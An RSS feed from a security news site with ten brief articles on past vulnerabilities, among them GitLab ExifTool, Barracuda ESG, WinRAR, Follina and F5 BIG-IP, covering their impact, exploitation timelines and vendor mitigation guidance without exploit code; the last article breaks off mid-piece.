<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>0dayNews</title><description>Independent coverage of CVEs, KEV catalog additions, and breach news.</description><link>https://0daynews.com/</link><language>en-us</language><item><title>GitLab&apos;s ExifTool RCE: A Patch That Sat Unrecognized for Months</title><link>https://0daynews.com/articles/2026-07-06-gitlab-exiftool-rce-cve-2021-22205/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-06-gitlab-exiftool-rce-cve-2021-22205/</guid><description>CVE-2021-22205 was quietly fixed in April 2021 — but its full unauthenticated remote-code-execution severity wasn&apos;t widely understood until late 2021, by which point mass exploitation had already begun.</description><pubDate>Mon, 06 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;A patch existing and a patch being applied are two different things — and the gap between them is exactly what made &lt;a href=&quot;/cve/cve-2021-22205/&quot;&gt;CVE-2021-22205&lt;/a&gt; dangerous months after GitLab had already fixed it.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw is a remote-code-execution vulnerability in GitLab Community Edition and Enterprise Edition, in how the platform handles certain uploaded image files. A crafted image, processed through a vulnerable version of the bundled ExifTool metadata-parsing library, could trigger arbitrary code execution on the GitLab server — reachable by any unauthenticated user able to reach an image-upload endpoint, no login required.&lt;/p&gt;
&lt;h2&gt;Why the timeline matters&lt;/h2&gt;
&lt;p&gt;GitLab originally patched the underlying issue in April 2021. But the security community&apos;s initial understanding of the bug&apos;s severity didn&apos;t match reality: the original patch notes didn&apos;t clearly convey that this was full pre-authentication remote code execution, and the vulnerability didn&apos;t attract the urgent, wide-scale patching response a bug of that severity should have. It took researchers re-analyzing the fix months later, in late 2021, to demonstrate the complete unauthenticated exploitation path publicly — and once that happened, exploitation moved fast.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;GitLab instances host an organization&apos;s source code repositories, CI/CD pipeline configuration, and frequently embedded deployment secrets and API credentials — a compromise here rarely stays contained to &quot;just&quot; the Git server. Once public proof-of-concept exploit code circulated in late 2021, mass scanning of internet-exposed GitLab instances began, with attackers using compromised servers for cryptomining and, in some cases, further network pivoting using credentials found in repositories.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;CISA added the CVE to its KEV catalog in late 2021, months after GitLab&apos;s original patch, once active mass exploitation was confirmed — a useful case study in why patch &lt;em&gt;availability&lt;/em&gt; and patch &lt;em&gt;adoption&lt;/em&gt; need to be tracked separately, and why security teams should treat &quot;patched months ago&quot; as no guarantee that every instance actually got the update. Organizations still running unpatched GitLab versions were urged to update immediately and to review logs for signs of prior exploitation. Full technical detail and patch guidance are in &lt;a href=&quot;https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/&quot;&gt;GitLab&apos;s security release notes&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-22205&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-06-gitlab-exiftool-rce-cve-2021-22205/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2021-22205</category><category>GitLab</category><category>ExifTool</category><category>remote code execution</category><category>patch adoption gap</category></item><item><title>Barracuda Told Customers to Replace Their Appliances, Not Just Patch Them. Here&apos;s Why.</title><link>https://0daynews.com/articles/2026-07-05-barracuda-esg-zero-day-cve-2023-2868/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-05-barracuda-esg-zero-day-cve-2023-2868/</guid><description>CVE-2023-2868 was exploited as a zero-day for roughly seven months before discovery — and left some compromised appliances backdoored even after the software patch was applied.</description><pubDate>Sun, 05 Jul 2026 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;Most vulnerability disclosures end with &quot;apply the patch.&quot; &lt;a href=&quot;/cve/cve-2023-2868/&quot;&gt;CVE-2023-2868&lt;/a&gt; ended with something far more unusual: Barracuda telling a subset of customers to physically replace their appliances, because a software patch alone wouldn&apos;t remove what attackers had already planted.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw is a remote command-injection vulnerability in Barracuda Networks&apos; Email Security Gateway (ESG) appliances, rooted in incomplete input validation in a module responsible for screening email attachments. Barracuda disclosed the issue on May 23, 2023 — but the investigation that followed the disclosure revealed something more troubling: the vulnerability had been actively exploited as a zero-day since at least October 2022, roughly seven months of undetected exploitation against a subset of ESG appliances before anyone noticed.&lt;/p&gt;
&lt;h2&gt;Why patching wasn&apos;t enough&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;This is the detail that sets CVE-2023-2868 apart from most perimeter-device CVEs.&lt;/strong&gt; The attackers who exploited the flaw during that seven-month window didn&apos;t just gain temporary access — they deployed custom malware built specifically for persistence and ongoing data exfiltration. Barracuda&apos;s forensic investigation found that on some compromised appliances, that malware persisted even after the software patch was applied, because the patch fixed the injection vulnerability but didn&apos;t remove an implant that had already established its own foothold on the device.&lt;/p&gt;
&lt;p&gt;That finding drove Barracuda&apos;s unusual remediation call: rather than trust a software fix to fully clean a potentially compromised unit, the company told affected customers to physically replace compromised ESG appliances outright — a step rarely recommended outside of firmware-level implant scenarios, and a signal of how seriously Barracuda treated the risk of residual access.&lt;/p&gt;
&lt;h2&gt;Who was behind it&lt;/h2&gt;
&lt;p&gt;CISA and threat intelligence researchers linked the campaign to a China-nexus espionage actor, and the targeting pattern reinforced that assessment: a relatively small, apparently selective number of government and high-value organizational targets, rather than the indiscriminate mass-scanning pattern typical of most KEV-catalog perimeter-device bugs.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Organizations running affected ESG appliances were directed to Barracuda&apos;s investigation findings to determine compromise status and, where indicators of compromise were present, to replace the physical appliance rather than rely on the patch alone. Full detail on the incident and remediation guidance is in &lt;a href=&quot;https://www.barracuda.com/company/legal/esg-vulnerability&quot;&gt;Barracuda&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-2868&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-05-barracuda-esg-zero-day-cve-2023-2868/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2023-2868</category><category>Barracuda ESG</category><category>Email Security Gateway</category><category>appliance replacement</category><category>persistent backdoor</category></item><item><title>The WinRAR Bug That Hid a Malicious Script Behind a Fake Photo</title><link>https://0daynews.com/articles/2026-07-05-winrar-path-traversal-cve-2023-38831/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-05-winrar-path-traversal-cve-2023-38831/</guid><description>CVE-2023-38831 let a booby-trapped archive execute code when a user clicked what looked like a harmless image file — exploited against trading forums before the technical details were widely known.</description><pubDate>Sun, 05 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;WinRAR sits on hundreds of millions of Windows machines, many with automatic update prompts routinely clicked away — exactly the slow-patching install base &lt;a href=&quot;/cve/cve-2023-38831/&quot;&gt;CVE-2023-38831&lt;/a&gt; was suited to exploit.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw involves how WinRAR handles a specific kind of crafted archive: one built so that a decoy folder shares a name with what appears to be a harmless file inside — a &lt;code&gt;.jpg&lt;/code&gt;, for instance. When a user double-clicked the seemingly innocuous file in WinRAR&apos;s preview to view it, the naming trick caused a hidden malicious script to execute instead of the expected image viewer opening the photo. RARLAB shipped a fix in WinRAR 6.23, released August 2, 2023, with the vulnerability formally disclosed and cataloged on August 23, 2023.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Security researchers found evidence that this technique was already being used in the wild — in campaigns targeting cryptocurrency and stock-trading forums — before the technical details were widely publicized, with malicious archives disguised as trading tools, account statements, or investment documents distributed to forum users. WinRAR&apos;s massive, slow-to-update install base (the application has no built-in auto-update mechanism by default) made it an attractive, durable vector: a single crafted archive could remain effective against unpatched installs for a long time after the fix shipped.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Because WinRAR doesn&apos;t auto-update, the core remediation guidance emphasized manual action: users and administrators need to actively download and install version 6.23 or later rather than wait for a prompt. CISA added the CVE to its KEV catalog given confirmed active exploitation. Organizations distributing WinRAR internally via software management tools were advised to push the update explicitly rather than rely on end users to do so. Full technical detail is in &lt;a href=&quot;https://www.rarlab.com/rarnew.htm&quot;&gt;RARLAB&apos;s release notes&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-38831&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-05-winrar-path-traversal-cve-2023-38831/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2023-38831</category><category>WinRAR</category><category>RARLAB</category><category>path traversal</category><category>spoofed file extension</category></item><item><title>vCenter&apos;s Unrestricted-Upload Bug: A Reminder That Management Planes Shouldn&apos;t Face the Internet</title><link>https://0daynews.com/articles/2026-07-04-vmware-vcenter-vsphere-client-rce-cve-2021-21972/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-04-vmware-vcenter-vsphere-client-rce-cve-2021-21972/</guid><description>CVE-2021-21972 let unauthenticated attackers execute code with root privileges on VMware vCenter Server — and internet scans found tens of thousands of instances exposed anyway, against VMware&apos;s own guidance.</description><pubDate>Sat, 04 Jul 2026 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;VMware has said for years that vCenter Server should never be directly reachable from the internet. &lt;a href=&quot;/cve/cve-2021-21972/&quot;&gt;CVE-2021-21972&lt;/a&gt; showed how many organizations ignored that guidance — and what it cost them when a maximum-impact bug arrived.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw sits in a plugin exposed through the vSphere Client (HTML5), part of vCenter Server&apos;s management interface. Any unauthenticated attacker with network access to vCenter&apos;s HTTPS port could upload a specially crafted file and use it to execute arbitrary commands with unrestricted privileges — effectively root or SYSTEM-equivalent access to the underlying host operating system. VMware disclosed the flaw on February 23, 2021, with a CVSS score of 9.8, reflecting both the lack of any access requirement and the severity of the resulting compromise.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;vCenter Server is the central management plane for VMware vSphere virtualization environments — the console that controls every virtual machine, physical host, and datastore in the environment it manages. A vCenter compromise isn&apos;t contained to one system; it&apos;s a path to control over an organization&apos;s entire virtualized infrastructure. Within days of VMware&apos;s advisory, researchers published working exploit code, and internet-wide scanning found tens of thousands of vCenter instances directly reachable from the public internet — a configuration VMware had explicitly warned against in its own deployment documentation for years. Mass exploitation and opportunistic scanning followed almost immediately once exploit code was public.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;VMware&apos;s guidance was direct: patch immediately, and at minimum ensure the vCenter management interface is isolated from the internet on an internal, access-controlled network — not exposed directly, regardless of patch status. The vulnerability was added to CISA&apos;s KEV catalog. Full technical detail and patch availability are in &lt;a href=&quot;https://www.vmware.com/security/advisories/VMSA-2021-0002.html&quot;&gt;VMware&apos;s security advisory (VMSA-2021-0002)&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-21972&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-04-vmware-vcenter-vsphere-client-rce-cve-2021-21972/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2021-21972</category><category>VMware vCenter Server</category><category>vSphere Client</category><category>unrestricted file upload</category><category>virtualization security</category></item><item><title>Spring4Shell: Why This One Needed Careful Triage, Not Panic</title><link>https://0daynews.com/articles/2026-07-04-spring4shell-vmware-spring-framework-rce/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-04-spring4shell-vmware-spring-framework-rce/</guid><description>CVE-2022-22965 leaked publicly before VMware&apos;s patch was ready — but unlike Log4Shell, exploitation required a specific combination of conditions that made blanket panic the wrong response.</description><pubDate>Sat, 04 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;The name was almost designed to cause panic: &quot;Spring4Shell,&quot; disclosed barely four months after Log4Shell, in a framework nearly as widely deployed. &lt;a href=&quot;/cve/cve-2022-22965/&quot;&gt;CVE-2022-22965&lt;/a&gt; turned out to be serious — but not universally exploitable in the way its namesake suggested, and the distinction mattered for how security teams should have responded.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The Spring Framework, the widely used Java application framework stewarded by VMware, contains a data-binding process that — under a specific set of conditions — could be manipulated by a remote attacker to reach the underlying ClassLoader and ultimately write a malicious file to a web-accessible path, achieving remote code execution. VMware confirmed the flaw on March 31, 2022, the same day proof-of-concept exploit details leaked publicly ahead of the official patch, forcing an accelerated release.&lt;/p&gt;
&lt;h2&gt;The conditions that mattered&lt;/h2&gt;
&lt;p&gt;Unlike Log4Shell&apos;s near-universal applicability, Spring4Shell required a specific combination: JDK 9 or later, Spring MVC or Spring WebFlux, and — critically — deployment as a traditional WAR file on Apache Tomcat rather than the increasingly common embedded-server or Spring Boot executable-JAR deployment model many newer applications use. Applications outside that combination weren&apos;t vulnerable to this specific CVE, even though they still used Spring.&lt;/p&gt;
&lt;h2&gt;Why the distinction mattered&lt;/h2&gt;
&lt;p&gt;In the first 48 hours, confusion was widespread — some teams treated it as Log4Shell-scale, others dismissed it prematurely. Both reactions carried risk: overreacting wastes scarce incident-response capacity that might be needed elsewhere, while underreacting leaves genuinely vulnerable applications exposed. VMware&apos;s advisory functioned as much as risk-triage guidance as a patch notice, spelling out exactly which deployment configurations were affected so security teams could prioritize accurately rather than guess.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Apply VMware&apos;s/Spring&apos;s patched framework versions regardless of the specific deployment model, since the underlying data-binding issue was fixed framework-wide — but prioritize incident response and forensic review specifically for applications matching the vulnerable configuration. CISA added the CVE to its KEV catalog following confirmed in-the-wild exploitation. Full technical detail and the complete list of vulnerable configurations are in &lt;a href=&quot;https://tanzu.vmware.com/security/cve-2022-22965&quot;&gt;VMware&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-22965&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-04-spring4shell-vmware-spring-framework-rce/cover.jpg" medium="image" width="1200" height="675"/><category>Spring4Shell</category><category>CVE-2022-22965</category><category>Spring Framework</category><category>VMware</category><category>data binding</category></item><item><title>The Confluence Bug That Went From Zero-Day to Mass Ransomware Precursor in Days</title><link>https://0daynews.com/articles/2026-07-03-confluence-ognl-injection-cve-2022-26134/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-03-confluence-ognl-injection-cve-2022-26134/</guid><description>CVE-2022-26134 gave unauthenticated attackers remote code execution on any exposed Confluence instance — and became a go-to foothold for ransomware operators within days of disclosure.</description><pubDate>Fri, 03 Jul 2026 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;Documentation platforms rarely make headlines the way perimeter firewalls do — until a bug like &lt;a href=&quot;/cve/cve-2022-26134/&quot;&gt;CVE-2022-26134&lt;/a&gt; turns one into an unauthenticated remote-code-execution target overnight.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw is an OGNL (Object-Graph Navigation Language) injection vulnerability in Atlassian Confluence Server and Data Center. Specially crafted input reaching a vulnerable endpoint would be evaluated as an OGNL expression rather than treated as inert data — and OGNL expressions in Confluence&apos;s context can execute arbitrary code on the underlying server. No authentication was required at any step. Atlassian disclosed the bug on June 2, 2022, after its own security team, working with an incident responder, discovered it was already being exploited as a zero-day.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Confluence is where an organization&apos;s institutional knowledge tends to accumulate — architecture diagrams, internal network documentation, and, not infrequently, credentials or API keys pasted into a wiki page by someone who meant to remove them later. That combination — sensitive documentation plus a foothold into the internal network — makes Confluence a favorite precursor target for ransomware operators, not just an isolated data-exposure risk. Within days of disclosure, mass internet scanning began, with attackers deploying webshells and cryptomining payloads against any Confluence instance left unpatched and internet-exposed.&lt;/p&gt;
&lt;h2&gt;Atlassian&apos;s response&lt;/h2&gt;
&lt;p&gt;Atlassian shipped emergency patches within roughly 48 hours of public disclosure — an unusually fast turnaround reflecting the severity — and published interim mitigation steps, including a temporary workaround and WAF rule, for organizations that couldn&apos;t patch immediately. CISA added the CVE to its KEV catalog.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Patch to a fixed Confluence version immediately; where immediate patching isn&apos;t possible, apply Atlassian&apos;s documented interim mitigation and restrict internet exposure of the instance in the meantime. Full technical detail and patch availability are in &lt;a href=&quot;https://confluence.atlassian.com/security/cve-2022-26134-1233684593.html&quot;&gt;Atlassian&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-26134&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-03-confluence-ognl-injection-cve-2022-26134/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2022-26134</category><category>Atlassian Confluence</category><category>OGNL injection</category><category>ransomware precursor</category><category>webshell</category></item><item><title>FortiOS Auth Bypass: Why Fortinet Warned Select Customers Before Going Public</title><link>https://0daynews.com/articles/2026-07-03-fortios-fortiproxy-auth-bypass-cve-2022-40684/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-03-fortios-fortiproxy-auth-bypass-cve-2022-40684/</guid><description>CVE-2022-40684 let attackers bypass authentication on FortiOS and FortiProxy management interfaces and plant persistent SSH keys — Fortinet quietly warned targeted customers before public disclosure.</description><pubDate>Fri, 03 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Vendors usually disclose a vulnerability to everyone at once. When Fortinet found evidence &lt;a href=&quot;/cve/cve-2022-40684/&quot;&gt;CVE-2022-40684&lt;/a&gt; was already being exploited against specific customers, it broke from that pattern — quietly warning a targeted subset before the public advisory went out on October 10, 2022.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw is an authentication bypass affecting the administrative interface of FortiOS, FortiProxy, and FortiSwitchManager. By sending specially crafted requests to the management interface, an unauthenticated remote attacker could perform administrative actions without valid credentials. The most consequential of those actions: adding a new SSH public key to an administrative account, giving the attacker persistent access that would survive a subsequent password reset — since the key, not a password, is what grants access.&lt;/p&gt;
&lt;h2&gt;Why the private warning mattered&lt;/h2&gt;
&lt;p&gt;Fortinet&apos;s decision to privately notify select customers ahead of the public disclosure reflected genuine urgency: the company had evidence of active, apparently targeted exploitation before the advisory went public, and wanted at-risk customers patched before attackers could act on the now-public technical details. It&apos;s an unusual step for a vendor and a signal, in hindsight, of how seriously Fortinet treated the in-the-wild activity.&lt;/p&gt;
&lt;h2&gt;Why it mattered broadly&lt;/h2&gt;
&lt;p&gt;FortiGate firewalls and FortiProxy appliances are perimeter devices — the boundary between an organization&apos;s internal network and the internet, and often the VPN gateway for remote access as well. A management-plane compromise here is a foothold for deeper intrusion, not just a device-level problem. Because attackers could plant SSH keys for persistence, Fortinet&apos;s remediation guidance went further than &quot;apply the patch&quot;: administrators were told to audit for unauthorized admin accounts and unrecognized SSH keys on any potentially exposed device, treating exposure as presumed compromise rather than assuming a clean patch fixed everything.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Apply Fortinet&apos;s patched FortiOS/FortiProxy releases, restrict management-interface access to trusted networks, and audit administrative accounts and SSH keys for anything unrecognized — patching alone does not remove a key an attacker already planted. CISA added the CVE to its KEV catalog with an expedited deadline. Full technical detail is in Fortinet&apos;s PSIRT advisory (FG-IR-22-377) and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-40684&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-03-fortios-fortiproxy-auth-bypass-cve-2022-40684/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2022-40684</category><category>FortiOS</category><category>FortiProxy</category><category>authentication bypass</category><category>SSH key persistence</category></item><item><title>F5 BIG-IP&apos;s Maximum-Severity Auth Bypass: What CVE-2022-1388 Actually Exposed</title><link>https://0daynews.com/articles/2026-07-02-f5-big-ip-icontrol-rest-auth-bypass/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-02-f5-big-ip-icontrol-rest-auth-bypass/</guid><description>A critical authentication-bypass flaw in F5 BIG-IP&apos;s iControl REST API let unauthenticated attackers execute system commands on appliances that front an enormous share of enterprise application traffic.</description><pubDate>Thu, 02 Jul 2026 15:00:00 GMT</pubDate><content:encoded>&lt;p&gt;An application-delivery controller sits between the internet and every application it fronts — which is exactly why &lt;a href=&quot;/cve/cve-2022-1388/&quot;&gt;CVE-2022-1388&lt;/a&gt;, a maximum-severity flaw in F5&apos;s BIG-IP management API, drew mass scanning activity within days of disclosure.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The bug lives in BIG-IP&apos;s iControl REST API, the interface administrators use to configure and manage the appliance. By sending specially crafted HTTP requests, an unauthenticated attacker with network access to the management port — or, in some configurations, a self-IP address used for internal traffic — could bypass iControl REST&apos;s authentication entirely and execute arbitrary system commands with full administrative effect: creating or deleting files, disabling services, or taking over the appliance outright. F5 disclosed the flaw on May 4, 2022 with a CVSS score of 9.8.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;BIG-IP appliances load-balance and terminate traffic for the applications behind them at large enterprises and service providers — a compromised appliance threatens everything it fronts, not just itself. Within days of F5&apos;s advisory, security researchers published working proof-of-concept exploit code, and mass internet scanning for exposed, vulnerable BIG-IP management interfaces began almost immediately. Confirmed exploitation followed within roughly a week, consistent with the pattern seen across most perimeter-appliance CVEs disclosed with public PoCs.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;F5&apos;s guidance was direct: patch immediately, and in the meantime restrict network access to the management interface and self-IP addresses to trusted internal networks only — a baseline configuration recommendation that, notably, many affected organizations had not enforced, which is part of why exposure was so widespread. CISA added the CVE to its KEV catalog with an expedited remediation deadline for federal systems. Full technical detail and patch availability are in &lt;a href=&quot;https://my.f5.com/manage/s/article/K23605346&quot;&gt;F5&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-1388&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-02-f5-big-ip-icontrol-rest-auth-bypass/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2022-1388</category><category>F5 BIG-IP</category><category>iControl REST</category><category>authentication bypass</category><category>application delivery controller</category></item><item><title>Follina Explained: The MSDT Bug That Skipped the Macro Warning Entirely</title><link>https://0daynews.com/articles/2026-07-02-follina-msdt-zero-day-explained/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-02-follina-msdt-zero-day-explained/</guid><description>CVE-2022-30190 let a Word document trigger arbitrary code execution through the Windows Support Diagnostic Tool — no macros, and in some configurations no explicit click required beyond opening the file.</description><pubDate>Thu, 02 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;/cve/cve-2022-30190/&quot;&gt;CVE-2022-30190&lt;/a&gt; — known widely by the nickname &quot;Follina&quot; — followed a familiar 2021-2022 pattern almost exactly: a document-based zero-day that bypassed the macro-security defenses organizations had spent years building, exploited in the wild before anyone outside the attacker&apos;s circle knew it existed.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The bug sits in the Windows Support Diagnostic Tool (MSDT), a legitimate Windows troubleshooting utility. A Word document referencing a remote HTML template could invoke the &lt;code&gt;ms-msdt:&lt;/code&gt; URI protocol handler, using it to run arbitrary PowerShell commands — triggered simply by opening the document, and in certain Office configurations even by the document preview pane, without the user clicking anything further.&lt;/p&gt;
&lt;h2&gt;How it was discovered&lt;/h2&gt;
&lt;p&gt;Independent researchers first drew widespread public attention to the technique on May 27, 2022, after spotting a malicious Word document in the wild that used it — a sample apparently already being used operationally before the security research community identified the pattern. Microsoft confirmed and formally disclosed the vulnerability on May 30, 2022, along with confirmation of active exploitation.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Like CVE-2021-40444 the year before, Follina&apos;s exploitation path didn&apos;t require macros — meaning years of &quot;disable macros from the internet&quot; security awareness training didn&apos;t protect against it. The technique was fast to weaponize and easy to replicate once public, and was adopted broadly by both espionage-motivated and financially motivated threat actors within days of the initial public report, well before Microsoft&apos;s official patch shipped in its June 2022 Patch Tuesday release.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s interim guidance — disabling the MSDT URL protocol handler via a documented registry change — was published before the full patch and gave defenders an emergency stopgap. CISA added the CVE to its KEV catalog. Full technical detail and remediation guidance are in &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190&quot;&gt;Microsoft&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-30190&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-02-follina-msdt-zero-day-explained/cover.jpg" medium="image" width="1200" height="675"/><category>Follina</category><category>CVE-2022-30190</category><category>MSDT</category><category>Windows Support Diagnostic Tool</category><category>zero-day</category></item><item><title>The MSHTML Zero-Day That Turned a Word Document Into Full Code Execution</title><link>https://0daynews.com/articles/2026-07-01-mshtml-office-zero-day-cve-2021-40444/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-01-mshtml-office-zero-day-cve-2021-40444/</guid><description>CVE-2021-40444 let attackers execute arbitrary code through a malicious Office document with no macros required — exploited in the wild before Microsoft&apos;s patch existed.</description><pubDate>Wed, 01 Jul 2026 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;For years, &quot;don&apos;t enable macros in an email attachment&quot; was the single most repeated piece of security advice for Office document phishing. &lt;a href=&quot;/cve/cve-2021-40444/&quot;&gt;CVE-2021-40444&lt;/a&gt; didn&apos;t need macros at all.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The flaw lives in MSHTML, the legacy Trident browser-rendering engine that Windows and certain Office components still rely on for specific document-rendering tasks. Microsoft disclosed the bug on September 7, 2021, confirming it was already being exploited in the wild as a zero-day. The attack technique: a malicious Word document referencing a remote HTML template that loaded a specially crafted ActiveX control, achieving remote code execution the moment the document was opened — no macro prompt, no additional user interaction beyond normal document handling in many default configurations.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;The macro-blocking defenses many organizations had spent years deploying — disabling macros from internet-sourced documents by default, training users to recognize the &quot;Enable Content&quot; prompt as a red flag — didn&apos;t apply here, because the exploit chain never touched macros. That made it an attractive vector for phishing campaigns during the roughly two-week window between public disclosure and Microsoft&apos;s full tested patch, a gap threat intelligence researchers observed being used by multiple actors to deliver commodity malware loaders.&lt;/p&gt;
&lt;h2&gt;Microsoft&apos;s interim mitigation&lt;/h2&gt;
&lt;p&gt;Before the complete patch was ready, Microsoft published a stopgap: disabling ActiveX control installation in Internet Explorer via a registry change, since MSHTML&apos;s vulnerable rendering path was shared infrastructure underneath Office&apos;s own document handling. Security teams widely adopted the workaround as an emergency measure while waiting for the full fix.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
